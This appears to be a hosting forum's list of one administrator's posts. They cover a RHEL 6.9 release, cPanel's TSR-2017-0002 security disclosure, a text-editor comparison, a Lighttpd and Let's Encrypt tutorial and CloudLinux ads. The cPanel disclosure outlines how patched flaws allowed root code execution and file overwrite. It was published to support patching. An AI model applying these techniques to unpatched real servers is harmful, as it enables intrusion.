NickTheGreek (Administrators)
Content Count: 454 · Days Won: 76 · Feedback: N/A
Everything posted by NickTheGreek

  1. It's time to say both hello and goodbye. Hello to Red Hat Enterprise Linux (RHEL) 6.9, the latest update to the RHEL 6 platform. And goodbye, because this will be the last major update to this six-year-old enterprise Linux server distribution.

Red Hat has just released the last major version of its RHEL 6.x operating system family: RHEL 6.9. RHEL 6.x has long been a business server favorite. With this final edition, Red Hat delivers new hardware support and updates to Transport Layer Security (TLS) 1.2 to improve network security. As you probably know, if you care at all about security, TLS implementations such as OpenSSL have had numerous security holes in recent months. The new RHEL 6 also comes with broader support for the latest Payment Card Industry Data Security Standard (PCI DSS) standards. If you're using RHEL in retail, this alone makes RHEL 6.9 a must-update.

Jim Totton, Red Hat's VP and general manager of the Platforms Business Unit, said in a statement, "For more than six years, RHEL 6 has provided enterprise IT with a more secure, stable, and reliable platform for mission-critical workloads, from financial systems to national security applications. RHEL 6.9 shows our continued commitment to providing a solid backbone for production deployments, adding security and stability enhancements and an updated container base image to address a variety of vital business IT needs."

While emphasizing stability for existing IT infrastructure, RHEL 6.9 looks ahead by supporting the next generation of cloud-native applications through an updated base image. This image enables you to migrate your existing RHEL 6 workloads into container-based applications, which can then be deployed on RHEL 7, RHEL Atomic Host, or Red Hat OpenShift Container Platform. As for RHEL 6 itself, it enters Production Phase 3 on May 10, 2017. That means subsequent updates will be limited to critical security fixes and urgent, business-impacting issues.
RHEL 6.x will be supported until at least November 2020. After that, its support life may be extended further with Extended Life-cycle Support. For more details on RHEL's support, see the Red Hat Enterprise Linux Life Cycle web page. Since RHEL subscriptions aren't tied to a particular release, you can also update your RHEL 6 servers to RHEL 7 whenever you want at no charge. To help you with this migration, Red Hat provides instructions and two tools: Preupgrade Assistant and Red Hat Upgrade Tool.

RHEL 6.9 is now available to all customers with an active Red Hat Enterprise Linux subscription via the Red Hat Customer Portal. If you're already a RHEL 6 user, this update is a no-brainer. Its security improvements alone make upgrading your servers to it a top priority. http://www.zdnet.com/article/red-hat-releases-the-last-of-the-rhel-6-x-line/
  2. cPanel TSR-2017-0002 Full Disclosure

SEC-208
Summary: Addon domain conversion did not require a package for resellers.
Security Rating: cPanel has assigned this vulnerability a CVSSv3 score of 2.7 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L).
Description: Previously, when you converted an addon domain to a normal account, a reseller was not required to specify a package for the account creation. This allowed the reseller to use the system's "default" package, which has no account limits. Now an addon domain conversion requires that a reseller have and specify a valid package for the account.
Credits: This issue was discovered by the cPanel Security Team.
Solution: This issue is resolved in builds 11.62.0.17, 11.60.0.39, 11.58.0.45, and 11.56.0.46.

SEC-217
Summary: Self-XSS vulnerability in the WHM cPAddons 'showsecurity' interface.
Security Rating: CVSSv3 score 4.7 (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N).
Description: When accessing the WHM cPAddons 'showsecurity' interface, the 'addon' parameter was not adequately escaped during page output. This could allow arbitrary code to be injected into the rendered page.
Credits: This issue was discovered by the cPanel Security Team.
Solution: This issue is resolved in builds 11.62.0.17, 11.60.0.39, 11.58.0.45, and 11.56.0.46.

SEC-218
Summary: Arbitrary file read via WHM /styled/ URLs.
Security Rating: CVSSv3 score 6.0 (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).
Description: WHM supports /styled/ URLs in order to allow reseller interface customization and branding. It is possible for these URLs to load and display content from a reseller's home directory. These files were loaded as the root user, which allowed arbitrary files on the system to be read.
Credits: This issue was discovered by the cPanel Security Team.
Solution: This issue is resolved in builds 11.62.0.17 and 11.60.0.39.

SEC-219
Summary: File overwrite when renaming an account.
Security Rating: CVSSv3 score 3.2 (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N).
Description: When renaming an account, it was possible to manipulate the security policy directories within the user's home directory to overwrite certain files the user did not own.
Credits: This issue was discovered by the cPanel Security Team.
Solution: This issue is resolved in builds 11.62.0.17, 11.60.0.39, 11.58.0.45, and 11.56.0.46.

SEC-220
Summary: Arbitrary code execution during account modification.
Security Rating: CVSSv3 score 8.2 (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H).
Description: When the primary domain of an account was changed in WHM's "Modify an Account" interface, the .htaccess file in the account's docroot was updated. This .htaccess update process included a syntax test, during which it was possible for the cPanel user to execute arbitrary code as root.
Credits: This issue was discovered by the cPanel Security Team.
Solution: This issue is resolved in builds 11.62.0.17, 11.60.0.39, 11.58.0.45, and 11.56.0.46.

SEC-221
Summary: Arbitrary code execution during automatic SSL installation.
Security Rating: CVSSv3 score 8.8 (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).
Description: During AutoSSL installation for user-controlled domains, the .htaccess file in the domain's docroot was updated to bypass redirects that would interfere with the domain validation process. This .htaccess update process included a syntax test, during which it was possible for the cPanel user to execute arbitrary code as root.
Credits: This issue was discovered by the cPanel Security Team.
Solution: This issue is resolved in builds 11.62.0.17 and 11.60.0.39.

SEC-223
Summary: Security policy questions were not transferred during account rename.
Security Rating: CVSSv3 score 2.6 (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N).
Description: If an account had security questions set up and that account was renamed, the questions were not transferred to the renamed account correctly. This allowed an attacker to set up their own security questions by logging into the target account after a rename was performed.
Credits: This issue was discovered by the cPanel Security Team.
Solution: This issue is resolved in builds 11.62.0.17, 11.60.0.39, 11.58.0.45, and 11.56.0.46.

SEC-224
Summary: cPHulk one-day ban bypass when IP-based protection enabled.
Security Rating: CVSSv3 score 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
Description: Under certain settings it was possible to never trigger a one-day ban when IP-based protection was also enabled. Now IP addresses are properly banned for one day when the specified threshold is reached.
Credits: This issue was discovered by the cPanel Security Team.
Solution: This issue is resolved in builds 11.62.0.17, 11.60.0.39, 11.58.0.45, and 11.56.0.46.

SEC-225
Summary: Code execution as root via overlong document root path settings.
Security Rating: CVSSv3 score 8.8 (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).
Description: By specifying a document root path that exceeds Apache's maximum configuration line length, it was possible for the excess data to be interpreted as a new configuration directive. This could allow an attacker to run arbitrary code as the root user.
Credits: This issue was discovered by the cPanel Security Team.
Solution: This issue is resolved in builds 11.62.0.17, 11.60.0.39, 11.58.0.45, and 11.56.0.46.

SEC-226
Summary: Arbitrary file overwrite via the WHM Zone Template editor.
Security Rating: CVSSv3 score 6.8 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N).
Description: The WHM Zone Template editor interface did not properly validate the template filename when saving. This allowed resellers to overwrite arbitrary files on the system.
Credits: This issue was discovered by rack911labs.com.
Solution: This issue is resolved in builds 11.62.0.17, 11.60.0.39, 11.58.0.45, and 11.56.0.46.

SEC-227
Summary: Expand list of reserved usernames.
Security Rating: CVSSv3 score 6.0 (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N).
Description: It was possible to create certain user accounts and then leverage the user's home directory to enable various exploits. These account names have been added to the reserved username list.
Credits: This issue was discovered by rack911labs.com.
Solution: This issue is resolved in builds 11.62.0.17, 11.60.0.39, 11.58.0.45, and 11.56.0.46.

SEC-228
Summary: Adding parked domains to the mail configuration did not respect domain ownership.
Security Rating: CVSSv3 score 2.4 (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N).
Description: It was possible for a reseller to add parked domains that they did not own to the Exim mail configuration. A reseller must now own a parked domain to perform any action on it.
Credits: This issue was discovered by the cPanel Security Team.
Solution: This issue is resolved in builds 11.62.0.17, 11.60.0.39, 11.58.0.45, and 11.56.0.46.

SEC-229
Summary: URL filtering flaw allowed access to restricted resources.
Security Rating: CVSSv3 score 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).
Description: Due to faulty URL filtering, authenticated webmail accounts could access the PHPMyAdmin and PHPPGAdmin interfaces.
Credits: This issue was discovered by the cPanel Security Team.
Solution: This issue is resolved in builds 11.62.0.17, 11.60.0.39, 11.58.0.45, and 11.56.0.46.

SEC-232
Summary: Demo code execution via the Htaccess::setphppreference API.
Security Rating: CVSSv3 score 7.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L).
Description: The Htaccess::setphppreference API call was not restricted for demo accounts and accepted arbitrary data to be written into the account's .htaccess file. This could allow an attacker to execute arbitrary code under the demo account.
Credits: This issue was discovered by the cPanel Security Team.
Solution: This issue is resolved in builds 11.62.0.17, 11.60.0.39, 11.58.0.45, and 11.56.0.46.

SEC-233
Summary: Arbitrary code execution for demo accounts via the NVData_fetchinc API call.
Security Rating: CVSSv3 score 7.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L).
Description: The NVData_fetchinc API call could accept an arbitrary filename to be included and processed by the cPanel engine. It was possible for an attacker to use this to execute arbitrary code under a demo account.
Credits: This issue was discovered by the cPanel Security Team.
Solution: This issue is resolved in builds 11.62.0.17, 11.60.0.39, 11.58.0.45, and 11.56.0.46.
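The CVSSv3 strings in the disclosure above are machine-readable vectors: slash-separated metric:value pairs after the CVSS:3.0 prefix. A minimal sketch of pulling one metric out of a vector with standard shell tools; the get_metric helper name is mine, not part of any cPanel or FIRST tooling:

```shell
# Split a CVSSv3 vector on '/' and print the value of one metric.
# get_metric is a hypothetical helper, not from any cPanel tool.
get_metric() {   # usage: get_metric VECTOR METRIC
  echo "$1" | tr '/' '\n' | awk -F: -v m="$2" '$1 == m { print $2 }'
}

vector="CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"   # SEC-225's vector
get_metric "$vector" AV   # attack vector: L (local)
get_metric "$vector" C    # confidentiality impact: H (high)
```

Reading AV, PR, and UI this way is a quick check of whether a fix applies to your threat model, e.g. AV:L issues require a local account.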
  3. If you want to turn a polite conversation into a heated debate then start talking about religion, politics, or text editors. Yes, you heard me right. Text editors. Without trying to rekindle the editor wars, let's look at when you might consider using nano, emacs, or vim.

Nano

Nano is without a doubt the simplest, least complicated, and least powerful of the three editors. The great thing about nano is that it really doesn't have much of a learning curve. Any time you're using nano you'll see a list of all the commands you'll need at the bottom of your screen. You don't have to remember any commands, ever. Just know that the caret symbol "^" represents the control key, so ^X is really Ctrl-X and it exits nano. When you perform different operations, the menu displayed at the bottom of your screen updates with the currently available commands, and any prompts that need to be dealt with are displayed at the bottom of the screen as well. For example, if you try to exit nano with unsaved changes, you'll be prompted to save them with a Yes/No question.

Nano Pros: No learning curve. Easy to use. Idiot-proof. Good for simple edits.

Nano Cons: Making complicated edits can be difficult and time-consuming. No powerful features such as macros, editing multiple files at once, window splitting, vertical block/rectangle selection and editing, auto-completion, etc.

Who Nano Is For: Nano is great for people who are new to the command line or for anyone who needs to make a very simple edit. If you're a casual Linux user or hobbyist, nano might be all you ever need.

Emacs

Emacs is a text editor, but it's so much more than that. It comes with a built-in web browser, IRC client, calculator, and even Tetris. Emacs has a keyboard shortcut for absolutely everything. The good thing about that is you can often stay in your normal typing position, which makes you fairly efficient. The downside is that you end up having to remember a lot of shortcuts with various combinations of multiple modifier keys. For example, the shortcut to quit Emacs is C-x C-c: hold down the control key, type x, then type c.

One of the areas where Emacs really shines is its ability to be fully customized. If you find yourself wanting to do something the authors didn't think of, you can implement it yourself using Emacs Lisp. Of course, you have to know or learn Lisp to do it, but it's at least possible.

Emacs Pros: Customizable and extensible. Powerful editing capabilities. Mature integration with many free software programming tools. You never need to leave it, because you can edit files, browse the web, and so on.

Emacs Cons: Questionable ergonomics (AKA "Emacs pinky syndrome"). If you want to customize Emacs you'll need to learn Emacs Lisp, which introduces a whole new learning curve. Not available everywhere by default: if you need to edit files on a system where you don't have root access and emacs isn't installed, you'll end up using vim. Lack of emacs availability is common on server installations.

Who Emacs Is For: Emacs is for people who want more than just a text editor, as Emacs can be an "environment." It's also for people who have a strong desire or need to customize their tools.

Vim

I'm a huge fan of the "make each program do one thing well" philosophy. As we've already covered, Emacs is not only a text editor; it's also an IRC client, a game console, and a web browser. You could argue that the one thing Emacs does well is editing text, but it's definitely not my go-to choice for a web browser. Nano does one thing, but not very well; by that I mean it has limited functionality as a text editor. That leaves Vim. It adheres to the "do one thing and do it well" philosophy, because the one thing it does extremely well is edit text.

If you're a sysadmin, a programmer, or anyone who needs to do serious text editing, then vim could be the next (and last) editor you'll ever need to learn. Once you have a handle on vim you'll be super fast and efficient. If you're going to work regularly at the command line, learning this powerhouse editor is a worthwhile investment. With the ability to edit and view multiple files at once, create macros, perform global substitutions, and more, you'll look like a genius when you press a couple of keys and great swaths of text fall into place just the way you want.

Even if you're not into being as productive as you can be, you still need to learn the basics of vim, because sooner or later you'll end up using it whether you like it or not. Vim is the default editor for the overwhelming majority of Linux distributions. This means you'll find yourself using vim with programs that do not include their own built-in editor, such as crontab, visudo, git, etc. Also, because many server installations only include what is necessary to perform their primary function, you often won't find emacs installed by default. With sysadmin tools relying on vim and a lack of other text editors, knowing vim is a must. Said another way, if you are or ever want to be a Linux system administrator, you HAVE to know vim.

Vim Pros: Vim serves one and only one purpose: to efficiently edit text. It's astoundingly powerful. Making complicated edits can be quick and easy. You can unlock unparalleled efficiency and speed with powerful features such as multiple file/window support, keyboard shortcuts for everything, macros, registers, quick command repetition, auto-completion, text objects, filters, and global substitutions.

Vim Cons: The learning curve often scares away new users. If you don't know what you're doing you'll look like an idiot. ("How do I exit out of Vim?!?!?!") If you only ever need to perform super simple edits, Vim can be overkill.

Who Vim Is For: Vim is a must for Linux system administrators. It's also great for programmers, because coding is mainly editing plain text files, which Vim excels at. It's also ideal for anyone who works on the command line often or has to log into Linux servers. Really, Vim is for those who work with textual data of any type. https://www.linuxtrainingacademy.com/nano-emacs-vim/
  4. Linux ip Command Networking Cheat Sheet https://www.linuxtrainingacademy.com/linux-ip-command-networking-cheat-sheet/
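A few of the read-only queries such a cheat sheet typically covers, runnable without root on any distribution that ships iproute2 (the flags shown are standard ip(8) usage, not taken from the linked sheet):

```shell
# Inspect interfaces, addresses, and routes with ip(8); read-only, no root needed.
ip link show          # all network interfaces and their link state
ip addr show          # interfaces together with their IPv4/IPv6 addresses
ip route show         # the kernel IPv4 routing table
ip -s link show lo    # per-interface packet/byte counters (loopback here)
```

The write operations (ip addr add, ip link set, ip route add) use the same object/verb structure but require root.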
  5. Year 2038 problem. From Wikipedia, the free encyclopedia. [Figure: animation showing how the date would reset, represented as a signed 32-bit integer, at 03:14:08 UTC on 19 January 2038.] The Year 2038 problem is an issue for computing and data storage situations in which time values are stored or calculated as a signed 32-bit integer, and this number is interpreted as the number of seconds since 00:00:00 UTC on 1 January 1970 (the epoch).[1] Such implementations cannot encode times after 03:14:07 UTC on 19 January 2038, a problem similar to but not entirely analogous to the Y2K problem (also known as the Millennium Bug), in which 2-digit values representing the number of years since 1900 could not encode the year 2000 or later. Most 32-bit Unix-like systems store and manipulate time in this Unix time format, so the year 2038 problem is sometimes referred to as the Unix Millennium Bug by association. https://en.wikipedia.org/wiki/Year_2038_problem
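You can see the boundary with GNU date, which accepts -d @N meaning "N seconds since the epoch" (this assumes coreutils date, as shipped on most Linux systems):

```shell
# 2^31 - 1 = 2147483647 is the last second a signed 32-bit time_t can hold:
# 03:14:07 UTC on 19 January 2038.
date -u -d @2147483647
# One second later a 32-bit counter wraps to -2^31, landing back in 1901:
date -u -d @-2147483648
```

On a 64-bit time_t the same arithmetic does not overflow until far beyond the age of the universe, which is why migrating to 64-bit time representations is the standard fix.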
  6. They don't elaborate any further, so in practice it's a bug-fix release?
  7. March 16, 2017. With the first TSR release of 2015 we began providing CVSSv2 scores in our full disclosure of resolved security issues in cPanel & WHM. The CVSSv2 scoring system, finalized in June 2007, is a free and open standard that attempts to rate the severity of security vulnerabilities. In June 2015 this scoring system was updated to version 3, which includes several changes to the way that scores are determined. Specifically, the underlying vectors used to derive the numerical scores of the metric groups have been changed, and the updated scoring system is intended to reflect a more accurate estimation of the severity of vulnerabilities. Beginning with the second TSR release of 2017 (TSR-2017-0002, expected on March 21st), we will provide a CVSSv3 Base vector score range in our TSR announcements, and the full Base vector string and score for each resolved vulnerability in our full disclosure announcements. If you would like to learn more about the various vectors used to calculate CVSSv3 scores, along with the underlying reasoning as applicable to the CVSS standard, please see https://www.first.org/cvss and https://www.first.org/cvss/calculator/3.0. http://news.cpanel.com/updates-to-tsr-announcement-and-disclosure-information/
  8. We're due for an update tonight.
  9. The majority of researchers predict new technological developments in our near future. They predict that the internet will become even more important to our lives, even as it becomes less visible. They argue that the internet will become the equivalent of "electricity," offering ever greater interconnection between human and machine, changing everything from interpersonal interactions to decisions taken at government level around the world. The internet has not only grown but evolved over the last two decades, often in unpredictable ways. The first push was the construction of the internet itself: companies such as AOL built the infrastructure and brought first America and then the rest of the world into continuous online connection. That phase peaked around the turn of the century, laying the foundations for the second wave, which brought applications and services and made the internet dominant in both communication and the economy. A third wave is already under way. According to forecasts, within the next decade the internet will be ubiquitous; the speed at which it delivers text, data, and images will be enormous, and its mass use will make it not only an integral part of our daily lives but also "invisible," that is, omnipresent, much as we perceive and use electricity today. The numbers are staggering: in 1995, 39.6 million people worldwide were connected to the internet. That number reached 1 billion in 2005 and 3.2 billion in 2015, and is projected to reach 7.6 billion by 2020; notably, forecasts suggest the online population will exceed the actual human population.

From these figures alone it is clear that the internet is now challenging the primacy of once-dominant sectors of the economy, such as healthcare, education, financial services, energy, and transport, which together account for more than half of the Western economy. Consider only how much the advent of the internet has changed the way education is delivered; e-learning, for instance, is one of its applications. The spread of the internet may well strengthen global connectivity and upgrade relations between societies. The figures are again impressive: every second we send 7,173 tweets, make 53,766 Google searches, watch 120,607 YouTube videos, and send 2,481,685 emails, while internet traffic amounts to 35 million megabytes per second. Speeds are getting faster too. In 1995, downloading a four-minute song took 540 seconds; in 2005 it took 11 seconds; and by 2015 it loaded almost instantly, in just 2 seconds. The internet, artificial intelligence, and vast volumes of data will give people a better understanding of their world and their own behavior. It is no accident, then, that most experts predict that in the not-too-distant future the "Internet of Things" will comprise a global, immersive, invisible computer-network environment. The data in circulation keeps multiplying: Amazon already operates 30 data centers with 50,000 servers, and it is estimated that within 2017 there will be around 9 million data centers worldwide. Most predict that in the not-too-distant future the "Internet of Things" will include: a global, immersive, invisible, ambient computer-network environment.

A continuous spread of smart sensors, cameras, software, databases, and enormous data centers in a world resting on what is called the "Internet of Things," whereby the internet extends into the physical world, encompassing and connecting things, everyday physical objects, and artifacts, remotely and via protocols. Wearable technologies that will allow people to "augment reality." The end of the business models that emerged in the 20th century, chiefly in education, entertainment, and print media. The management of an incredibly large volume of data. In essence, we face a broader change, one that will require alliances and constructive dialogue between the worlds of politics, the economy, and communication, and which, as the figures suggest, will gain even greater momentum. In other words, a "brave new digital world" is rapidly emerging as the internet and related technologies spread. But could this be bad news rather than good? The gap between rich and less wealthy countries remains. Less wealthy countries without access to these technologies, for example, will be at a disadvantage compared with others, and in some cases, according to forecasts, social inequalities could worsen. This runs counter to some of the assumptions, such as the idea that the spread of the internet will reduce inequality. In India, for example, internet access remains limited despite Facebook's popularity there. The spectacular growth of the internet has undeniably changed not only business models but also the way we function as a society.

It has affected how we search for and share information, the volume of information we are expected to share, and how and when we communicate with one another. The "Next Internet," as it is called, gathers and combines three interconnected systems: cloud computing, big data analytics, and the Internet of Things. It promises businesses and government organizations centralized data storage and services in vast digital factories that process and analyze the ceaseless streams of information collected by networked sensors, embedded in every conceivable consumer device, in the office or the marketplace, and even in living organisms. But it also creates significant challenges for the environment, privacy, and labor. The cloud and big data have been greatly strengthened by the growth of the internet. From watches that monitor blood pressure to refrigerators that ask you to buy more milk, from assembly lines "manned" by robots to drones that deliver weapons, it promises a profound social impact. The Internet of Things refers to a system that installs sensors and processing devices in everyday objects (e.g. watches) and production tools (robotic arms) and connects them in networks that gather and use data about their performance. We use the admittedly odd term "Internet of Things" because, unlike the internet we know, which connects people, the Internet of Things mainly connects objects. The sensors in a refrigerator form a network of things that reports on what is inside and how it is used.

The Internet of Things has been made possible by advances in the ability to miniaturize sensing devices and to provide enough processing power to monitor an activity, analyze its usage, and deliver the recorded results over electronic networks. How will we face this brave new digital world? What are we doing in Greece? Unfortunately, we remain preoccupied with the early phase of the internet's development, measuring its spread and reach, when these questions are already considered settled in other countries. Stelios Papathanassopoulos, Professor of Media Organization and Policy, Department of Communication and Media Studies, National and Kapodistrian University of Athens. http://www.indeepanalysis.gr/nees-technologies/to-diadiktyo-twn-anthrwpwn-kai-twn-pragmatwn
  10. Iread your Nginx and Let’s Encrypt free SSL certificate tutorial. However, I use Lighttpd web server on AWS cloud. How do I secure my Lighttpd web server with Let’s Encrypt free SSL certificate on my Ubuntu Linux 16.04 LTS or Debian Linux 8.x server?Let’s Encrypt is a free, automated, and open certificate authority for your website or any other projects. You can grab free TLS/SSL certificate to create encrypted HTTPS session for your site visitors. In this tutorial, I will explain how to use Let’s Encrypt to install a free SSL certificate for Lighttpd web server along with how to properly deploy Diffie-Hellman on your Lighttpd server to get SSL labs A+ score. Our sample setup Fig.01: Our sample Lighttpd TLS/SSL Security with Let’s Encrypt on Debian or Ubuntu Linux Default Lighttpd config file : /etc/lighttpd/lighttpd.conf Default Lighttpd SSL config file : /etc/lighttpd/conf-enabled/10-ssl.conf Lighttpd SSL certification directory : /etc/lighttpd/ssl/cyberciti.biz/ Lighttpd DocumentRoot (root) path : /var/www/html/ Lighttpd TLS/SSL Port: 443 Our sample domain: www.cyberciti.biz Dedicated public IP: 74.86.26.69 Step 1 – Install acme.sh client Type the following apt-get command/apt command:$ sudo apt-get install git bc wget curl Sample outputs: Fig.02: Install git and bc on Ubuntu/Debian Linux Step 2 – Clone repo Type the following commands:$ cd /tmp $ git clone https://github.com/Neilpang/acme.sh.git $ sudo -i # cd /tmp/acme.sh/ # ./acme.sh --install Sample outputs: Fig.03: Clone the acme.sh client using git Rest of all command need to be type as root user. 
Become root user:$ sudo -i Step 3 – Create /.well-known/acme-challenge/ directory Type the following command (set D to actual server.document-root path as per your setup):# D=/var/www/html # mkdir -vp ${D}/.well-known/acme-challenge/ ###---[ NOTE: Adjust permission as per your setup ]---### # chown -R www-data:www-data ${D}/.well-known/acme-challenge/ # chmod -R 0555 ${D}/.well-known/acme-challenge/ Step 4 – Create directory to store SSL certificate Type the following mkdir command:# mkdir -p /etc/lighttpd/ssl/cyberciti.biz/ Step 5 – Create your dhparam.pem file Type the following command to create a strong Diffie-Hellman (DH) group file:# cd /etc/lighttpd/ssl/cyberciti.biz/ # openssl dhparam -out dhparam.pem -dsaparam 4096 Sample outputs: Step 6 – Issue a certificate for your domain The syntax is:acme.sh --issue -w /server.document-root-path/ -d www.example.com acme.sh --issue -w /var/www/html/ -d example.com -k 2048 To issue a certificate for www.cyberciti.biz, enter:# acme.sh --issue -w /var/www/html -d www.cyberciti.biz -k 4096 Sample outputs: Fig.04: Issue a certificate Step 7 – Enable ssl for Lighttpd Type the following command:# lighttpd-enable-mod sslEnabling ssl: ok Run /etc/init.d/lighttpd force-reload to enable changes Step 8 – Lighttpd SSL Configuration Edit the file /etc/lighttpd/conf-enabled/10-ssl.conf, enter:# vi /etc/lighttpd/conf-enabled/10-ssl.conf Update it as follows: # turn on ssl # $SERVER["socket"] == "0.0.0.0:443" { ssl.engine = "enable" ssl.disable-client-renegotiation = "enable" ssl.pemfile = "/etc/lighttpd/ssl/cyberciti.biz/ssl.pem" ssl.ca-file = "/etc/lighttpd/ssl/cyberciti.biz/ca.cer" ssl.dh-file = "/etc/lighttpd/ssl/cyberciti.biz/dhparam.pem" # ECDH/ECDHE ciphers curve strength ssl.ec-curve = "secp384r1" ssl.use-compression = "disable" # Environment flag for HTTPS enabled setenv.add-environment = ( "HTTPS" => "on" ) ssl.use-sslv2 = "disable" ssl.use-sslv3 = "disable" ssl.honor-cipher-order = "enable" ssl.cipher-list = 
"EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH"
  # HSTS (15768000 seconds = 6 months)
  setenv.add-response-header = ( "Strict-Transport-Security" => "max-age=15768000;" )
}

Save and close the file.

Step 9 – Install the issued certificate for the Lighttpd web server

First, create a hook for the lighttpd ssl.pem file as follows:
# vi /root/.acme.sh/www.cyberciti.biz/hook.sh
Append the following script:

#!/bin/bash
dom="www.cyberciti.biz"                # your domain name
dest="/etc/lighttpd/ssl/cyberciti.biz" # lighttpd ssl path root
croot="/root/.acme.sh/${dom}"          # acme.sh root path for your domain
### NO edit below ###
sslfile="${dest}/ssl.pem"              # lighttpd .pem file path
certfile="${croot}/${dom}.cer"         # lighttpd certificate file path
keyfile="${croot}/${dom}.key"          # lighttpd key file path
echo "Running lighttpd cmd..."
/bin/cat "${certfile}" "${keyfile}" > "${sslfile}"
/bin/systemctl restart lighttpd

Save and close the file. Set executable permissions:
# chmod +x /root/.acme.sh/www.cyberciti.biz/hook.sh

The above script will create a file named /etc/lighttpd/ssl/cyberciti.biz/ssl.pem (ssl.pem = cert + privkey). Type the following command to install the certificate and restart the lighttpd web server:
# acme.sh --installcert -d www.cyberciti.biz \
  --capath /etc/lighttpd/ssl/cyberciti.biz/ca.cer \
  --reloadcmd '/root/.acme.sh/www.cyberciti.biz/hook.sh'
Sample outputs:
[Sun Mar 12 19:51:30 UTC 2017] Installing CA to: /etc/lighttpd/ssl/cyberciti.biz/ca.cer
[Sun Mar 12 19:51:30 UTC 2017] Run reload cmd: /root/.acme.sh/www.cyberciti.biz/hook.sh
Running lighttpd cmd...
[Sun Mar 12 19:51:30 UTC 2017] Reload success

Step 10 – Test it

Verify that lighttpd is running on port 443:
# netstat -tulpn | grep ':443'
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 379/lighttpd

Step 11 – Open port 443 using the ufw firewall

Type the following ufw command to open port 443:
# ufw allow proto tcp from any to 74.86.26.69 port 443
Type the following URL in your browser:
https://www.cyberciti.biz

How do I renew a certificate?
# acme.sh --renew -d www.cyberciti.biz

How do I upgrade the acme.sh client?

# acme.sh --upgrade

A note about the cron job

A cron job will also try to renew the certificate for you. It is installed by default as follows (no action required on your part):

33 0 * * * "/root/.acme.sh"/acme.sh --cron --home "/root/.acme.sh" > /dev/

https://www.cyberciti.biz/faq/how-to-configure-lighttpd-web-server-with-free-lets-encrypt-ssl-certificate-on-debian-or-ubuntu-linux/
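Between renewals, it is useful to check how close the installed certificate is to expiry. Here is a minimal sketch, assuming the openssl CLI is installed; the check_expiry helper name is my own invention (not part of acme.sh), and the demo uses a throwaway self-signed certificate so the snippet is safe to run anywhere:

```shell
# check_expiry: succeed only if the PEM cert is valid for at least N more days.
check_expiry() {
  # usage: check_expiry /path/to/cert.pem DAYS
  pem=$1
  days=${2:-30}
  openssl x509 -checkend $(( days * 86400 )) -noout -in "$pem" > /dev/null
}

# Self-contained demo: generate a throwaway self-signed cert valid for 90 days.
openssl req -x509 -newkey rsa:2048 -nodes -subj "/CN=demo" \
  -keyout demo.key -out demo.crt -days 90 2> /dev/null

check_expiry demo.crt 30 && echo "still valid for 30+ days"
check_expiry demo.crt 120 || echo "would expire within 120 days: time to renew"
```

On the live server you would point check_expiry at /etc/lighttpd/ssl/cyberciti.biz/ssl.pem before or after running acme.sh --renew.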
  11. Hello Glencara,

    Welcome to designhost.gr.

    Feel free to browse our community accessing all sorts of information and getting to know our members.

    Do not hesitate to ask anything in our forums.

    designhost.gr

  12. Automated Kernel Security Updates Without Reboots Our easy, rebootless install with a single line of code will ensure you never miss another kernel security patch. Supports most popular Linux distributions: https://www.cloudlinux.com/all-products/product-overview/kernelcare
  13. Ultimate Security for Your Linux Web Server New from CloudLinux, the makers of the #1 OS in security and stability for hosted servers For CentOS, RHEL, and CloudLinux 6 & 7, with cPanel Coming soon: DirectAdmin, Plesk, ISPmanager, and servers without a control panel Imunify360 Keeps Your Web Servers Safe Your website is the lifeblood of your business. That’s why you need to protect your web server from digital attacks. Our automated security solution will protect your server from infections, maintain kernel updates, and keep you in the know with relevant information. Hands-off automation keeps your web server secure and keeps you in the know Imunify360 continuously protects your server, but you don’t always need to see the play-by-play. Use the centralized view to check in on the overall state of your server’s security with the option to view all security events. Powerful herd protection against the newest attacks We are constantly collecting and analyzing a massive amount of information about new attacks on a global scale. You benefit from these insights on the newest attacks from the moment you start. A security console right inside your hosting control panel, with 24x7 support Our software is integrated into your control panel (cPanel available now, DirectAdmin, Plesk, ISPmanager, & no panel coming soon), and runs on CentOS, RHEL, and CloudLinux 6 & 7 servers. Our expert staff is available 24/7/365 to answer questions and address any issues you have. https://imunify360.com/
  14. What is CloudLinux OS? CloudLinux OS is the leading platform for multitenancy. It improves server stability, density, and security by isolating each tenant and giving them allocated server resources. This creates an environment that feels more like a virtual server than a shared hosting account. By doing so, CloudLinux OS reduces operating costs and churn rates, and increases profitability. CloudLinux OS is designed for shared hosting providers. It isolates each customer into a separate “Lightweight Virtualized Environment” (LVE), which partitions, allocates, and limits server resources, like memory, CPU, and connections, for each tenant. This ensures that tenants cannot jeopardize the stability of your servers, causing all sites to slow down or even come to a halt. CloudLinux OS also “cages” tenants from one another to avoid security breaches. This way, unstable scripts or malware are not able to sprawl across your customer sites, causing severe harm. Results you can expect We work with thousands of hosting companies, and we see improvements in server performance, utilization, and margins across all of them! https://www.cloudlinux.com/all-products/product-overview/cloudlinuxos
  15. Today I ran into a WebMail issue where all the files had correct perms/ownership, but in WebMail the user could no longer see their email; all they got was:

"mail server closed the connection unexpectedly"

